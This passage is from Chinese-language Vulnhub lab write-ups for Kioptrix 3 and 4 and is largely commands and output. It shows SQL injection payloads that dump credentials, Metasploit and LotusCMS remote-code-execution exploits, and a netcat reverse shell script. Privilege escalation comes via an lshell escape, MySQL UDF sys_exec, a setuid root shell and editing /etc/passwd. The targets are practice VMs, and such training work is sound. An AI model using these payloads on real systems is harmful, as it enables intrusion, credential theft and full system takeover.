PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
 
[*] Started reverse TCP handler on 192.168.43.177:443 
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400
 
meterpreter > ls
Listing: /home/www/kioptrix3.com
================================
 
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 09:21:17 -0400  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  core
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  data
100644/rw-r--r--  23126  fil   2011-04-14 12:23:13 -0400  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 11:32:31 -0400  gallery
100644/rw-r--r--  26430  fil   2011-04-14 12:23:13 -0400  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 12:23:13 -0400  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  style
100644/rw-r--r--  243    fil   2011-04-14 12:23:13 -0400  update.php
</pre><p>權限有點小,很多命令都執行不了的。</p><h3><a name='header-n10259' class='md-header-anchor '></a>SQLmap進行SQL注入</h3><p>這個站是有的鏈接有問題,302跳轉到<code>kioptrix3.com</code></p><p>在<code>etc/passwd</code>添加</p><pre class="md-fences mock-cm md-end-block" lang="">192.168.43.158  kioptrix3.com
</pre><p><code>service networking restart</code>重啟服務</p><p>發現url存在SQL注入。<code>kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_7.png' alt='' referrerPolicy='no-referrer' /></p><p>先用<code>sqlmap</code>進行注入測試,id存在報錯注入。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_8.png' alt='' referrerPolicy='no-referrer' /></p><p>嘗試查找下后台管理員賬號密碼。</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>得到管理員賬號密碼,但是在</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><p>無法登錄,另外找到一個登錄的地方<code>http://kioptrix3.com/gallery/gadmin/</code></p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin    | n0t7t1k4 |
+----------+----------+
 
</pre><p>但是可以登錄。</p><p>這里雖然可以是<code>root</code>和<code>dba</code>權限,但是沒有絕對路徑。不能直接用sqlmap進行寫shell。</p><h3><a name='header-n10291' class='md-header-anchor '></a>手注sqli</h3><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#
</pre><p>判斷一共有6列</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_9.png' alt='' referrerPolicy='no-referrer' /></p><p>得到當前數據庫和版本號</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_10.png' alt='' referrerPolicy='no-referrer' /></p><p>得到當前數據庫所有的表名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_11.png' alt='' referrerPolicy='no-referrer' /></p><p>獲取表里的列名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_12.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n10315' class='md-header-anchor '></a>Lotus CMS 漏洞</h3><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion           | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities              | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</pre><p>從查詢結果看,有一個本地文件包含和一個遠程代碼執行,</p><p>這里的本地文件包含就是我們之前發現的那個。我們嘗試下這個本地文件包含漏洞</p><p>嘗試發現這個漏洞好像不行。</p><p>嘗試<code>LotusCMS 3.0 - 'eval()' Remote Command Execution</code> 發現是一個rb文件。</p><p>於是</p><pre class="md-fences mock-cm md-end-block" lang="">msf > search LotusCMS
 
Matching Modules
================
 
   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
 
</pre><p>利用這個漏洞進行攻擊</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp 
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Payload options (generic/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400
 
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd 
/home/www/kioptrix3.com
</pre><p>我嘗試用<code>cd</code>命令進入<code>gallery</code>目錄但是不行,</p><p>這里用到<code>ls -l</code>可以看到<code>gallery</code>目錄的文件</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php
</pre><p>發現<code>gconfig.php</code>配置文件,<code>cat</code>讀配置文件。</p><pre class="md-fences mock-cm md-end-block" lang="">  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
 
</pre><h3><a name='header-n10339' class='md-header-anchor '></a>lotusRCE.sh</h3><pre class="md-fences mock-cm md-end-block" lang="">wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158
 
Path found, now to check for vuln....
 
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
 
About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333
 
OK, open your local listener and choose the method for back connect: 
1) NetCat -e        3) NetCat Backpipe  5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
 
</pre><pre class="md-fences mock-cm md-end-block" lang="">root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
</pre><h2><a name='header-n10344' class='md-header-anchor '></a>權限提升</h2><p>嘗試用之前SQL注入得到的。</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>進行SSH連接,發現第一個賬號不能沒有多大的作用,不能提權。</p><p>連接第二個賬號</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
</pre><p>存在一個<code>CompanyPolicy.README</code>文件.</p><pre class="md-fences mock-cm md-end-block" lang="">checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
</pre><p>英語比較垃圾,百度翻譯的意思是可以通過<code>sudo ht</code>對文件進行編輯,創建。</p><p>在kali下嘗試</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
</pre><p>報錯不能打開一個<code>xterm-256color.</code>終端。</p><p>回到本地環境用<code>xshell</code>連接是可以打開的</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_13.png' alt='' referrerPolicy='no-referrer' /></p><p>此時按<code>F3</code>,可以輸入<code>/etc/passwd</code>或者<code>/etc/sudoers</code>文件來進行文件編輯</p><p>把/etc/passwd當前用戶的權限修改和<code>root</code>一樣即可。
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_14.png' alt='' referrerPolicy='no-referrer' /></p><p>也可以把/etc/sudoers當前用戶的權限修改和<code>root</code>一樣即可。
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_15.png' alt='' referrerPolicy='no-referrer' /></p><p>重新登錄SSH。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May  8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root
</pre><p>此時已經是<code>root</code>權限了。</p><h2><a name='header-n10381' class='md-header-anchor '></a>總結</h2><p>這次實驗過程挺長的,發現了很多地方的問題,第一是發現了<code>phpmyadmin</code>我嘗試用寫日志的方法試試能不能拿到shell。但是發現<code>phpmyadmin</code>變量了不存在<code>general log</code>變量。</p><p>另外就是這里有個SQL注入,可以用<code>sqlmap</code>跑出來,是<code>root</code>權限。嘗試用<code>os-shell</code>寫shell。通過了之前用遠程命令執行得到的絕對路徑,但是還是無法寫入。好像是目錄權限的問題。</p><p>在<code>phpmyadmin</code>下也無法執行<code>INTO OUTFILE</code>函數。顯示<code>#1 - Can't create/write to file</code>。從在命令執行里也看得出來目錄是沒有權限的。</p><p>在最后補充了一個文件包含和后台上傳的利用,這個組合通過文件包含執行圖片木馬,得到一個shell。雖然說很雞肋,還是感覺有點厲害的。</p><p>在實驗過程中還是想多多嘗試多種方法的,但是實驗環境還是有限。但在這次實驗中還是學到了很多,做了幾次<code>vulnhub</code>的實驗了,感覺提權方面還是有學習到很多。</p><p>雖然說這些環境有點不常見甚至奇葩,但是還是在這個過程中學到了<code>linux</code>環境下的一些之前一直匱乏的知識。</p><p> </p><h1><a name='header-n10396' class='md-header-anchor '></a>第十六節 Vulnhub滲透測試練習-Kioptrix 4</h1><hr /><p>title: Vulnhub滲透測試練習-Kioptrix 4
date: 2018-05-17 13:46:30
tags:</p><h2><a name='header-n10399' class='md-header-anchor '></a>作者:Ukonw</h2><p> </p><h3><a name='header-n10405' class='md-header-anchor '></a>信息收集</h3><p>用<code>nmap</code>進行端口掃描。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-17T09:58:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.32.58.187
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
</pre><p>從掃描結果可以得到,開發以下端口信息</p><ul><li>22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)</li></ul><p>訪問80端口下的WEB服務。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_1.png' alt='' referrerPolicy='no-referrer' /></p><p>嘗試萬能密碼繞過<code>'or 1=1#</code> 繞過失敗。</p><p>弱密碼<code>admin:admin</code>也是錯誤的。</p><p>嘗試<code>admin:'</code>,出現報錯。好爆出來了路徑<code>/var/www/checklogin.php</code>。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_2.png' alt='' referrerPolicy='no-referrer' /></p><p>存在POST型注入。</p><h2><a name='header-n10433' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n10434' class='md-header-anchor '></a>sqlmap進行SQL注入</h3><p><code>sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --current-user --current-db --is-dba</code></p><p>在注入的過程會遇到<code>302跳轉</code>選擇<code>n</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database:    'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA:    True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'
 
[*] shutting down at 02:00:45
</pre><p>通過注入得到用戶名和密碼</p><pre class="md-fences mock-cm md-end-block" lang="">Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
 
</pre><p>通過<code>--os-shell</code>寫入一個<code>webshell</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting at 02:09:06
 
[02:09:06] [INFO] resuming back-end DBMS 'mysql' 
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] 
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
</pre><p>但是權限很小。但是得到了數據庫的賬號密碼。</p><h3><a name='header-n10448' class='md-header-anchor '></a>通過SSH連接</h3><p>利用SQL注入得到的用戶名密碼SSH登錄。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help help
Limited Shell (lshell) limited help.
Cheers.
</pre><p>從這里我們可以利用的命令有</p><pre class="md-fences mock-cm md-end-block" lang="">cd  clear  echo  exit  help  ll  lpath  ls
</pre><p>重點其中有一個是<code>echo</code>。</p><p>我們可以利用他得到一個<code>bash交互shell</code></p><pre class="md-fences mock-cm md-end-block" lang="">john:~$ echo os.system('/bin/bash')     
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
</pre><p>權限還是當前用戶的權限。</p><h3><a name='header-n10463' class='md-header-anchor '></a>MySQL數據庫提權</h3><p>利用SQL注入得到的數據庫賬號密碼登錄MySQL數據庫。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
 
Connection id:      3520
Current database:   
Current user:       root@localhost
SSL:            Not in use
Current pager:      stdout
Using outfile:      ''
Using delimiter:    ;
Server version:     5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:   10
Connection:     Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:        /var/run/mysqld/mysqld.sock
Uptime:         1 hour 10 min 47 sec
</pre><p>嘗試<code>mysql udf 提權</code>。</p><p>在Windows環境下,執行命令</p><pre class="md-fences mock-cm md-end-block" lang="">USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
</pre><p>實現提權。</p><p>我們在實驗環境下進行Linux環境下的UDF提權操作。</p><p>首先找到<code>lib_mysqludf_sys.so</code>的目錄。</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                | 
+-----------------------------------------------------+
1 row in set (0.00 sec)
 
mysql> quit
Bye
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)
</pre><p>這樣就將<code>sys_exec()</code>函數執行的結果寫入到了<code>/tmp/out</code>下。</p><p>得知可以得到root權限。</p><p>可以寫一個c語言程序進行命令執行</p><pre class="md-fences mock-cm md-end-block" lang="">#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system(“/bin/bash”);
}
</pre><p>本地編譯上傳到目標靶機。</p><p>這里我用wget下載好像一下連接超時。可能是防火牆阻止流量。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> SELECT sys_exec('usermod -a -G admin');
